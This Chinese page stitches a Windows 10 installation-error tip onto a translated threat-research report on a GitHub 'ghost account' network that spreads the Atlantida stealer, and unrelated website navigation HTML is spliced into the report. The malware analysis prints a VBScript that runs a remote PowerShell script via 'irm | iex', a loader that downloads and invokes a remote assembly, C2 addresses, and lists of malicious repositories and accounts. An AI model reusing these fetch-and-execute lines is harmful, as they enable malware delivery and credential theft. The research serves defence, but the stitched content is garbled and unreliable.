S酋長在安裝Win10的過程中遇到了錯誤提示:
Windows無法安裝所需的文件。網絡問題可能正在阻止Windows訪問文件。請確保計算機已連接到網絡,并重新啟動安裝。錯誤代碼:0x80070005”。
出現這個問題的原因之一,是在前面的安裝過程進行到“獲取Windows安裝程序的重要更新”這一步時,選擇了“立即在線安裝更新”。如圖:
而這個選項要求在后期的安裝過程中計算機一直保持連接到Internet。而微軟的服務器在海外,所以后期的安裝過程中就可能會因為網絡問題而出現上面的“Windows無法安裝所需的文件…錯誤代碼:0x80070005”的問題。
所以,在“獲取Windows安裝程序的重要更新”這一步時應該選擇“不,謝謝”,這樣就不會遇到錯誤代碼:0x80070005了。
或者,你也可以在安裝前先斷網,直接拔掉網線或禁用網卡試試,應該也能解決問題。
還有一種可能,就是你下載的Win10 ISO鏡像有問題,所以建議安裝前先校驗一下下載的ISO鏡像文件的MD5或SHA1值是否一致。為了保險,建議使用微軟媒體創建工具下載原版Win10 ISO鏡像。
威脅行為者不斷改進其策略,以保持領先于檢測。通過包含惡意附件的電子郵件分發惡意軟件的傳統方法受到嚴格監控,公眾對這些策略的認識越來越高。最近,Check Point Research 觀察到威脅行為者使用 GitHub 通過使用新方法實現初始感染。以前,GitHub 用于直接分發惡意軟件,惡意腳本會下載原始加密腳本代碼或惡意可執行文件。
他們的戰術現在已經發生了變化和發展。威脅行為者現在運營著一個由“幽靈”賬戶組成的網絡,這些賬戶通過在其存儲庫上的惡意鏈接和加密檔案作為發布來分發惡意軟件。該網絡不僅分發惡意軟件,還提供各種其他活動,使這些“幽靈”帳戶看起來像正常用戶,從而為他們的行為和相關存儲庫提供虛假的合法性。Check Point Research 觀察到這些帳戶分叉、加星標和監視惡意存儲庫,營造出合法項目的假象,并引誘受害者下載“廣告”內容。
在短時間的監控中,我們發現了 2,200 多個發生“幽靈”活動的惡意倉庫。在 2024 年 1 月左右發生的一次活動中,該網絡分發了 Atlantida stealer,這是一種新的惡意軟件家族,會竊取用戶憑據和加密貨幣錢包以及其他個人身份信息 (PII)。這場運動非常有效,因為在不到 4 天的時間里,超過 1,300 名受害者感染了 Atlantida stealer。指向 GitHub 存儲庫的惡意鏈接可能是通過 Discord 頻道分發的。這些存儲庫針對各種類型的受害者,他們希望增加在 YouTube、Twitch 和 Instagram 上的關注者,并且還包含用于破解軟件和其他加密相關活動的網絡釣魚模板。
圖 1 – Stargazer Ghost 帳戶。
很長一段時間以來,GitHub 一直被用作分發惡意代碼的平臺。通常,此類活動中涉及的倉庫是為特定活動新創建的,并且通常會長時間保持在線狀態,然后被 GitHub 關閉或被威脅參與者清理。但是,這些存儲庫中的內容通常不會向普通用戶建議他們應該下載并執行任何托管腳本或可執行文件。
這些類型的攻擊并非旨在引誘用戶直接從存儲庫本身下載和執行有效負載。相反,它們通常涉及從看似合法的網站或來源下載和執行有效負載的腳本。這種方法有助于保持合法性的外觀,同時向受害者提供惡意內容。
Stargazers Ghost Network 通過提供一個惡意存儲庫來改變游戲規則,其中惡意鏈接被多個 GitHub 帳戶“加星標”和“驗證”,從而支持其合法性。
圖 2 – 惡意 GitHub 帳戶引誘 Twitch 用戶。
通常,網絡使用相同的標簽和圖像,但將“目標受眾”從一個社交媒體應用程序或破解軟件切換到另一個,但使用相同的模板。這表明網絡運營商可以自動化這些活動,從而確保其運營的效率和可擴展性。
圖 3 – TikTok、YouTube、Twitch、Instagram、…使用相同的網絡釣魚模板。
網絡釣魚模板包含指向外部網站的惡意鏈接。在某些情況下,此鏈接會將受害者重定向到惡意 GitHub 存儲庫的“發布”部分。GitHub 通常會嘗試檢測惡意文件或檔案,盡管在許多情況下,網絡使用受密碼保護的檔案來“隱藏”掃描解決方案中的任何惡意活動。README.mdDOWNLOAD
圖 4 – 惡意軟件通過密碼加密的存檔版本進行分發。
在這種情況下,包含一個網絡釣魚下載鏈接,該鏈接甚至不會重定向到存儲庫自己的版本。相反,它使用三個具有不同“職責”的 GitHub Ghost 帳戶:README.md
這種結構和操作方法使 Stargazer Goblin 能夠快速“修復”由于帳戶或倉庫被禁止進行惡意活動而可能發生的任何斷開鏈接。通過在多個賬戶之間分配責任,網絡確保了更換其受損組件的靈活性。這最大限度地減少了對其運營的干擾,使他們能夠迅速適應并繼續在 GitHub 上進行惡意活動。
第三個帳戶為惡意軟件提供服務,更有可能被檢測到。發生這種情況時,GitHub 會禁止整個帳戶、倉庫和相關版本。作為對此類行為的回應,Stargazer Goblin 使用指向新的活動惡意發布的新鏈接更新了第一個帳戶的網絡釣魚存儲庫。這使網絡可以在惡意軟件服務帳戶被禁止時以最小的損失繼續運行。
# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat)
### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.
**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.
## Features
- Live viewers
- Trovo Account creator
- Chat bot
- Follow bot
- Shares
- Mass report
- Support for multiple accounts to create organic traffic
- Customize time intervals between "views" to simulate a real user
- Simple and easy-to-use user interface
- Support for proxy servers for anonymity and security
## Technologies
- C programming language
- Work with social networks API
- Proxy and anonymity of network requests
- Web scraping and browser automation從有經驗的人來看,這些存儲庫似乎很可疑。令我們感到驚訝的是,這些倉庫中的每一個都收到了大量的“星星”。進一步調查發現,負責為這些惡意倉庫加星標/“點贊”的賬戶是同一操作不可或缺的一部分。
圖 6 – 惡意存儲庫的觀星者。
我們觀察到許多名為 Stargazer Ghost 的賬戶具有一種模式,這些賬戶包含具有以下特征的倉庫:
README.md
# {username}1
1
這里 {username} 是具體的用戶名部分,會被替換成實際的用戶名。
圖 7 – GitHub Ghost 帳戶存儲庫模式。
當我們搜索該特定模式時,我們發現了 1,100 多個存儲庫,這表明可能有 1,100 多個 Ghost GitHub 帳戶屬于這個惡意的 Stargazers 網絡。
圖 8 – README.md 內容模式。
Stargazers 網絡中的每個 Ghost-Stargazer 并不局限于只與一個存儲庫交互。其中許多帳戶與多個存儲庫交互,其中很大一部分顯然涉及惡意活動。但是,其他一些帶星號的存儲庫看起來同樣可疑,例如一些與 WordPress 相關的游戲模組工具。
圖 9 – Ghost 帳戶加星標的倉庫。
根據這些 Ghost Stargazers 的廣泛項目和“興趣”——從玩 Counter-Strike 到 Instagram 影響者,再到使用破解的防病毒軟件黑客攻擊和保護機器——我們能夠發現更多的惡意模板并進一步擴大我們的 Ghost Stargazer 賬戶集合。
圖 10 – 游戲作弊存儲庫。
當惡意鏈接重定向到 GitHub 版本時,我們觀察到關聯帳戶通過喜歡這些惡意版本來做出反應的情況。這種行為進一步強化了項目對毫無戒心的用戶所感知的“合法性”。
圖 11 – 釋放反應。
為了進一步區分帳戶及其操作,我們發現了一些情況,即也是該網絡一部分的其他帳戶提交了惡意網絡釣魚文件。README.md
圖 12 – 提交到另一個人的帳戶項目。
目前尚不清楚所有這些帳戶是否都是由 Stargazer Goblin 出于惡意目的創建的。正如我們后來的研究表明的那樣,其中一些帳戶已遭到入侵。這使得信息竊取者獲得的 GitHub 憑據變得有價值,而且,價值足以在地下市場上出售和購買。
多種不同的角色提供了便于網絡維護,因為 GitHub 不會關閉與分發惡意軟件的存儲庫相關的所有帳戶。這使得以下帳戶在對托管惡意軟件的存儲庫采取行動時以最小的“損害”繼續其操作:
下面的存儲庫自那時以來一直處于活動狀態,并經歷了 6 次鏈接更改。這 6 次提交是由 進行的,通過更新惡意軟件鏈接來維護攻擊鏈。buttercupserial/HubSpot-activation-by-nuat2024-05-28buttercupserial/168463497+buttercupserial@users.noreply.github.com
圖 13 – 維護提交。
提交日期 | 惡意軟件 URL |
2024-05-28T10:21:50Z | hxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest |
2024-05-29T07:35:32Z | hxxps://github[.]com/witch12138/test/releases/tag/lat |
2024-06-04T06:51:50Z | hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat |
2024-06-06T07:40:15Z | hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new |
2024-06-10T02:09:27Z | hxxps://goo[.]su/gisof1sda –> hxxps://github[.]com/zigzagcharming643/zigzagcharming643/releases/tag/lat |
2024-06-10T09:13:52Z | hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new |
提交精確地修改了下載鏈接,同時保持網絡釣魚模板的其余部分完好無損。
圖 14 — 鏈路更改。
最新的鏈接指向一個版本,該版本具有受密碼保護的存檔,該存檔執行GO下載器Git_softwares_v1.1.2.7zSetup_v1.1.2.exe (SHA256:98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388)
圖 15 – 受密碼保護的釋放。
該網絡的維護和恢復過程似乎是自動的,會檢測被禁止的帳戶/存儲庫,并在必要時進行修復。使用不同的賬戶角色可確保在 GitHub 對違反其規則的賬戶或倉庫采取行動時,只會造成最小的損害。
圖 16 – Stargazers Ghost Network 角色概述。
大多數時候,我們觀察到 Repository 和 Stargazer 賬戶不受禁令和倉庫下架的影響,而 Commit 和 Release 賬戶通常在檢測到其惡意倉庫后被禁止。找到包含被禁止的 Release-Repositories 鏈接的 Link-Repositories 是很常見的。發生這種情況時,與 Link-Repository 關聯的 Commit 帳戶會使用新鏈接更新惡意鏈接。
Commit 賬戶與 Repository 賬戶下的所有倉庫保持一對一的關系。這意味著同一個提交賬戶可以對屬于同一倉庫賬戶的倉庫進行多次提交。
對于典型的廣告系列,我們通常會遵守以下要求:
在上述場景中,Release 帳戶通常是第一個被禁止的。然后,網絡運營商創建一個新的惡意鏈接,并使用其相關的提交帳戶更新所有鏈接倉庫。總之,2 個賬戶(Repository/Commit),加上 X 個觀星者,仍然處于雷達之下,而 1 個 Release 賬戶可能會在未來的某個時候被禁止。這些網絡角色設法以某種方式“繞過”GitHub 的安全度量。
Check Point Research 詳細分析了一個具體案例,揭示了導致 Atlantida 竊取者的 GitHub 活動。惡意的 GitHub 鏈接可能是通過 Discord 分發的,針對 Twitch 用戶。攻擊鏈利用托管在受感染的 WordPress 網站上的惡意腳本,讓我們想知道帶有 WordPress 網站代碼的可疑 GitHub 存儲庫是否也可能發揮作用。
圖 17 – 攻擊鏈概述。
受害者會收到一個指向 GitHub 網絡釣魚存儲庫的鏈接,并點擊惡意下載鏈接,該鏈接會指導他們從 WordPress 網站下載腳本。聯系的 PHP 文件會檢查來自 HTTP 請求,以驗證受害者是否來自 GitHub,以及 IP 地址是否屬于 TOR 網絡或任何其他列入黑名單的 IP。驗證后,PHP 文件會將請求重定向到 。index.phpReferer headerdownload.php
README.md內容:
## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php)
### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.
**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.
## Features
- Automate page/video views on popular social platforms
- Support for multiple accounts to create organic traffic
- Customize time intervals between "views" to simulate a real user
- Functionality to enhance interaction with content (likes, comments, subscriptions)
- Simple and easy-to-use user interface
- Support for proxy servers for anonymity and security
## Technologies
- Python programming language
- Work with social networks API
- Proxy and anonymity of network requests
- Web scraping and browser automation
## License
[](LICENSE)下載的文件是一個名為 .HTAImpress_V1.0.2.hta 的文件。這個文件包含一個惡意的 iframe,其中有一個鏈接會執行 VBScript 代碼。
<iframe src="hxxp://astrahebz.com/te/g.mhtml" application="yes" style= " border:6px solid red;" title="useful 324 test">gfdsgfd</iframe>
<a href="#content" class="s-topbar--skip-link">Skip to main content</a>
<div class="s-topbar--container">
<a href="#" class="s-topbar--menu-btn js-left-sidebar-toggle" role="menuitem" aria-haspopup="true" aria-controls="left-sidebar" aria-expanded="false"><span></span></a>
<ol class="s-navigation" role="presentation">
<li class="md:d-none">
<a href=".co/" class="s-navigation--item js-gps-track" data-gps-track="top_nav.products.click({location:2, destination:7})" data-ga="["top navigation","about menu click",null,null,null]">About</a>
</li>
<li>
<a href="#" class="s-navigation--item js-gps-track js-products-menu" aria-controls="products-popover" data-controller="s-popover" data-action="s-popover#toggle" data-s-popover-placement="bottom" data-s-popover-toggle-class="is-selected" data-gps-track="top_nav.products.click({location:2, destination:1})" data-ga="["top navigation","products menu click",null,null,null]" aria-expanded="false">ass="s-popover--arrow"></div>
<ol class="list-reset s-anchors s-anchors__inherit">
<li class="m6">
<a href=".com/questions" class="bar-sm p6 d-block h:bg-black-225 js-gps-track" data-gps-track="top_nav.products.click({location:2, destination:2})" data-ga="["top navigation","public qa submenu click",null,null,null]">
<span class="fs-body1 d-block"> </span>
<span class="fs-caption d-block fc-black-400">Public questions & answers</span>
</a>
</li>
<li class="m6">
</form>VB 腳本包含執行 PowerShell 的混淆代碼,而 PowerShell 又從另一個 WordPress 網站運行遠程代碼。
VB 去混淆代碼:
<script language="vBsCrIpT">
Set tired52 = GetObject('winmgmts:\\\\\\\\.\\\\root\\\\cimv2')
Set shell29 = tired52.Get('Win32_Process')
intReturn = shell29.Create('powershell irm hxxp://astrahebz.com/te/useless.txt | iex', Null, Null, intProcessID)
</script>執行 .NET 注入器的 PowerShell 代碼。
$crop213 = @'
[DllImport("kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'@
Add-Type -MemberDefinition $crop213 -Namespace "crumble542543" -Name "culture6546"
$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()
[crumble542543.culture6546]::ShowWindow($danger5646, 0)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://astrahebz.com/te/tetete.bin")).EntryPoint.Invoke($null, @($null))此 .NET 注入器創建并注入 shellcode 的進程。最后,丟棄的惡意軟件是帶有C&C的Atlantida竊取者。Stealer 的網絡通信是未加密的純文本。第一個連接將 IP 信息發送到 ,在下一個連接中將 IP 信息發送到包含被盜信息的存檔 , , , 并且對于每個瀏覽器,Cookie/History/…regasm.exe185.172.128.95185.172.128.95:6666185.172.128.95:6665Screenshot.jpegUser Infromation.txtGeo Information.txtBrowserInfo.txt
圖 20 – 機器人的第一個請求。
圖 21 – 機器人的第二個請求。
該活動似乎針對的是希望在 Twitch、Instagram、YouTube、Twitter、Trovo 和 TikTok 上增加“關注者受眾”或使用其他與工具相關的功能進行 Kick Chat、Telegram、Email 和 Discord 的受害者。分發此模板和網絡釣魚鏈接的一些惡意存儲庫是:
armoly/Discord-Bot
armoly/Ds-Spm
armoly/Email-Spm
armoly/Tg-Spm
armoly/Tg-SpmTg-Spm
armoly/Twt-Spm
bleblquck/FT-Vieww
bleblquck/Kck-Vw
bleblquck/Trv-Vws
bleblquck/Tw-Vws
dscvm/Discord-Vbot
dscvm/Visoul-Grabber
glassmuysa/Htlx-Gen-Check
glassmuysa/Mail-Ac-Gen
glassmuysa/TwT-Genr
glassmuysa/Ytb-Dwnld
gooles54/Rison-Raid-Bot
gooles54/Rison-Trading-Bot
gooles54/WPscn
lzero121/TWT-vWS
lzero121/Ytb-Vws
lzero121/iNS-vWS
lzero121/tK-vWS
memekch/TWT-vWS
memekch/Ytb-Vws
memekch/iNS-vWS
memekch/tK-vWS
memo1l/ChatGpt-Turbo
sokratso/KMSpic-Ac
valiso0/Mail-Ac-Generator
valiso0/TwT-Gen
valiso0/Ytb-Dwnld與此同時,超過 380 個 Stargazer Ghost 帳戶為列出的 ~30 個倉庫加星標:
0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha9310, AmirChidan9, AngelFx777, Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055, Bahaabasuny0, Bazarasxx, BilalPasta,
Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Coding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr, Emaynike, EneerOP,
Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOXKEVINO, GabrielFel, GabrielHorbach, GabrielHorbach,, Gabst7, Gaplaster3600, Ghadir450, Git, Gokumase, Gonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx,
Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi, Jayko235, Jayxxx14, Jessy55491, JhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre, KenderMendoza2, Kets357,
Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagordo, LeoBello00, Lyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50, Mallco14,,
Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper, Nikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed,
OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA, Riles923, RimuruNeto, RolandSandorNagy, RoyalLegend0304, Ruhan44, SaidDEV89,
SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,, StrikerJapa, SusannBaldiviezo, Syedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin, ThiagoSilva97, Tomasdionisio, TulioInnoveSistema,
Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILWAP, Wanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001, Youssef, Zecuss, Zekoahmed,
Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, aminov1010, anaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg, asdssfsd, asliyiilmaz, asmuiahmad, asmuiahmad,, atoras34,
axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh, ecoplayer07, egoistpanel, elMarkoDev, epsilon201, f4h3m,
fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii, jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009,
khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, larryewakins, lawadas1231, lenegropu, lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, lukeomatik,
lyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marcosibottino, mariamlola, mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122, misterclima, mjsal,
mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost, noobking1234, noobking1234,, notayessir,
notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea, pierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo, ramdoni, ratihpurnamasar, raul2341, razzm7, rbxrecoveryexploits,
rcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr, rtR4RWp, rudy172, rxcw777, saadanjaved, saintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok,
sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani1122, therotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr, tvixterSourceCode, txxzclew, ugyen27, ultralinksgh, vault797478,
victid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm, yoosef30, yourscloudyy, yuong22, z8lc, z8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in在這些存儲庫中發生的事件略少于 2,000 個。令人印象深刻的是,2024 年 5 月 27 日發生了 621 起,2024 年 5 月 31 日發生了 555 起,這表明可能在這些日期前后發生了活動,或者 GitHub 中斷了部分操作,Stargazer Goblin 當時“修復”了網絡的受影響部分。
圖 22 – Stargazers Ghost Accounts 在與 Atlantida 戰役相關的存儲庫上的活動。
一個帳戶擁有存儲庫,另一個帳戶進行了提交,在某些情況下,這些提交還包含他們的電子郵件地址。這些文件的作者是:README.mdproton.meREADME.md
提交日期 | 提交作者 | 提交電子郵件 | 存儲 庫 |
2024-05-25T10:44:45Z 格林威治標準時間-5 | 殺戮軍團 | 166757567+slaycorpsa@users.noreply.github.com | 格拉斯穆伊薩/TwT-Genr |
2024-05-25T11:03:18Z 格林威治標準時間-5 | 殺戮軍團 | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Mail-Ac-Gen |
2024-05-25T11:55:04Z 格林威治標準時間-5 | 殺戮軍團 | 166757567+slaycorpsa@users.noreply.github.com | 格拉斯穆伊薩/Ytb-Dwnld |
2024-05-25T12:00:10Z 格林威治標準時間-5 | 殺戮軍團 | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/htlx-gen-檢查 |
2024-04-11T23:22:47Z 格林威治標準時間+2 | 特瓦里蘇阿 | 166768002+twarisua@users.noreply.github.com | valiso0/郵件交流發電機 |
2024-04-11T23:24:39Z 格林威治標準時間+2 | 特瓦里蘇阿 | 166768002+twarisua@users.noreply.github.com | valiso0/郵件交流發電機 |
2024-05-25T12:11:09Z 格林威治標準時間+2 | 特瓦里蘇阿 | 166768002+twarisua@users.noreply.github.com | valiso0/郵件交流發電機 |
2024-05-25T12:12:25Z 格林威治標準時間+2 | 特瓦里蘇阿 | 166768002+twarisua@users.noreply.github.com | valiso0/TwT-Gen |
2024-05-25T12:15:12Z 格林威治標準時間+2 | 特瓦里蘇阿 | 166768002+twarisua@users.noreply.github.com | valiso0/ytb-dwnld |
2024-05-26T10:54:48Z 格林威治標準時間-5 | 布拉戈斯洛 | seppdrmosi21@proton.me | dscvm/Discord-Vbot |
2024-05-26T11:07:42Z 格林威治標準時間-5 | 布拉戈斯洛 | seppdrmosi21@proton.me | dscvm/Visoul-Grabber |
2024-05-27T13:34:17Z 格林威治標準時間-5 | 埃利斯441 | killimagaro001@proton.me | gooles54/rison-raid-機器人 |
2024-05-27T14:10:03Z 格林威治標準時間-5 | 埃利斯441 | killimagaro001@proton.me | gooles54/rison-交易-機器人 |
2024-05-27T14:31:44Z 格林威治標準時間-5 | 埃利斯441 | killimagaro001@proton.me | gooles54/WPscn |
2024-05-30T20:24:15Z 格林威治標準時間-4 | 瓜拉12 | zerocoinmarksirt21@proton.me | lzero121/iNS-vWS |
2024-05-30T20:24:29Z 格林威治標準時間-4 | 瓜拉12 | zerocoinmarksirt21@proton.me | lzero121/tK-vWS系列 |
2024-05-30T20:24:46Z 格林威治標準時間-4 | 瓜拉12 | zerocoinmarksirt21@proton.me | lzero121/TWT-vWS |
2024-05-30T20:24:56Z 格林威治標準時間-4 | 瓜拉12 | zerocoinmarksirt21@proton.me | lzero121/ytb-vws |
2024-05-31T20:58:21Z 格林威治標準時間-4 | 庫徹爾52 | svarovsky00012@proton.me | bleblquck/FT-Vieww |
2024-05-31T20:58:46Z 格林威治標準時間-4 | 庫徹爾52 | svarovsky00012@proton.me | bleblquck/Kck-大眾 |
2024-05-31T20:58:59Z 格林威治標準時間-4 | 庫徹爾52 | svarovsky00012@proton.me | bleblquck/TRV-Vws |
2024-05-31T20:59:09Z 格林威治標準時間-4 | 庫徹爾52 | svarovsky00012@proton.me | bleblquck/TW-大眾 |
有趣的是,在存儲庫的情況下,有三個提交而不是一個。這表明,如果存儲庫未被發現并被禁止,則可以在多個活動中使用它。通常,行為是作者創建一個存儲庫,提交惡意代碼,不久之后,Stargazer 帳戶繼續為存儲庫加星標。valiso0/Mail-Ac-GeneratorREADME.md
在許多情況下,“網絡釣魚”模板顯然是針對普通用戶的,盡管有特定的目標受眾。在一個特定案例中,我們不知道他們是否針對安全研究人員或其他威脅參與者。該模板的標題“RisePro Stealer + HVNC Crack: The Ultimate Cybersecurity Threat”從理論上講,提供了已知信息竊取程序 RisePro 的破解版本。實際上,它用一個 GO 下載器感染了受害者,該下載器后來刪除了 Rhadamanthys。
圖 23 – RisePro 網絡釣魚模板。
其他存儲庫分發了相同的短鏈接,具有針對不同受眾的不同網絡釣魚模板。goo.su/n8J4mOH
AmerHashima/Voicemod-2024-Crack-Full-Version
Danms661/NEAR-HOT-WALLET-AUTOBOT
Danms661/SEED-SEARCHER-Crypto-Checker-30-Wallets
Danms661/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More
Essence-Of-Slimez-37/Pinnacle-Studio-Crack
Essence-Of-Slimez-37/Pro-Tools-Crack
Essence-Of-Slimez-37/ProtonVPN-Free-Crack-2024
Essence-Of-Slimez-37/ReiBoot-Pro-Crack-Download-Free
Essence-Of-Slimez-37/Revit-Crack
Essence-Of-Slimez-37/Rhinoceros-Crack
Essence-Of-Slimez-37/RisePro-Stealer-HVNC-Crack
Essence-Of-Slimez-37/SEED-SEARCHER-Crypto-Checker-30-Wallets
Essence-Of-Slimez-37/Simple-Checker-Crack
Essence-Of-Slimez-37/Snapster-autobot
Essence-Of-Slimez-37/SolidWorks-crack
Essence-Of-Slimez-37/Sound-Forge-crack
Essence-Of-Slimez-37/Steam-account-autoregger-creation-of-maFile
Essence-Of-Slimez-37/Sublime-Text-crack
Essence-Of-Slimez-37/TFT-Unlocker-Tool-FUll
Essence-Of-Slimez-37/TeamViewer-Latest-Crack-2024
Essence-Of-Slimez-37/The-unifier-is-both-Video
Essence-Of-Slimez-37/Toon-Boom-Harmony-Crack
Essence-Of-Slimez-37/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More
Essence-Of-Slimez-37/Unity-Pro-Cracks
Essence-Of-Slimez-37/VLC-Media-Player-Crack
Essence-Of-Slimez-37/Vape-V4-Crack-Kangaroo
Essence-Of-Slimez-37/Voicemod-2024-Crack-Full-Version
Essence-Of-Slimez-37/Youtube-365-Auto-upload-cheat-checker
Essence-Of-Slimez-37/ZBrush-Crack
Essence-Of-Slimez-37/pixel-wallet-bot-free
Essence-Of-Slimez-37/yescoin-bot-installation
HeangHorn/Corel-Draw-Free-Crack-2024
Knight-JNXU/Catizen-Auto-bot-autofarm
Major2000/Albion-2024
Major2000/EFT-ESP-hack
MikeWoWOne/Fortnite-hack-version
MikeWoWOne/GameMaker-Studio-2-Crack
MikeWoWOne/HWID-spoofer-for-games
MikeWoWOne/IObit-Uninstaller-Latest-Version-Crack
MikeWoWOne/JetBrains-IntelliJ-IDEA-Crack
MikeWoWOne/KMS-Auto-Windows-and-Office-Activator
MikeWoWOne/Kiddions-mod-menu-gta-5
MikeWoWOne/KuCoin-trading-bot
MikeWoWOne/Lethal-Company-Hack
MikeWoWOne/LoL-hack-script
MikeWoWOne/Lumion-Crack
MikeWoWOne/Magix-Music-Maker-Crack
MikeWoWOne/Matlab-Crack
MikeWoWOne/Movavi-Video-Editor-Pro-Crack-Download
MikeWoWOne/NARAKA-BLADEPOINT-Hack-Free
MikeWoWOne/NEAR-HOT-WALLET-AUTOBOT
MikeWoWOne/Navisworks-Crack
MikeWoWOne/Nero-Burning-ROM-Crack
MikeWoWOne/NordVPN-Pro-Crack-Full-Version
MikeWoWOne/hamster-kombat-bot-free
MikeWoWOne/memefi-coin-crypto-bot
Molano11/Nero-Burning-ROM-Crack
Molano11/Youtube-365-Auto-upload-cheat-checker
Ozkaynak-Sucuk/1inch-bot
Ozkaynak-Sucuk/ARK-radar-hack
Ozkaynak-Sucuk/Albion-2024
Ozkaynak-Sucuk/Apex-2024
Ozkaynak-Sucuk/Autodesk-Maya-Crack
Ozkaynak-Sucuk/BitMEX-trading-bot
Ozkaynak-Sucuk/Bitfinex-bot
Ozkaynak-Sucuk/Blum-auto-bot
Ozkaynak-Sucuk/Coinbase-pro-trading-bot
Ozkaynak-Sucuk/Cs-2-Hack-Skinchanger
Ozkaynak-Sucuk/Discord-Nitro-Alt-Generator-Free
Ozkaynak-Sucuk/Driver-Booster-Pro-License-Key-Crack
Ozkaynak-Sucuk/Fc-24-Hack-Free
Ozkaynak-Sucuk/FiveM-Hacks-2024
Ozkaynak-Sucuk/Fixing-Error-kernelbase
Ozkaynak-Sucuk/Fortnite-hack-version
SpacyXyt/Cinema-4D-Crack
SpacyXyt/LoL-hack-script
V-arc/Silverfish
batuhanodbs/FiveM-Hacks-2024
blackvn05/ReiBoot-Pro-Crack-Download-Free
dblancolascarez/CCleaner-Crack
jgprimaki/Microsoft-Office-2024-Cracked-Version
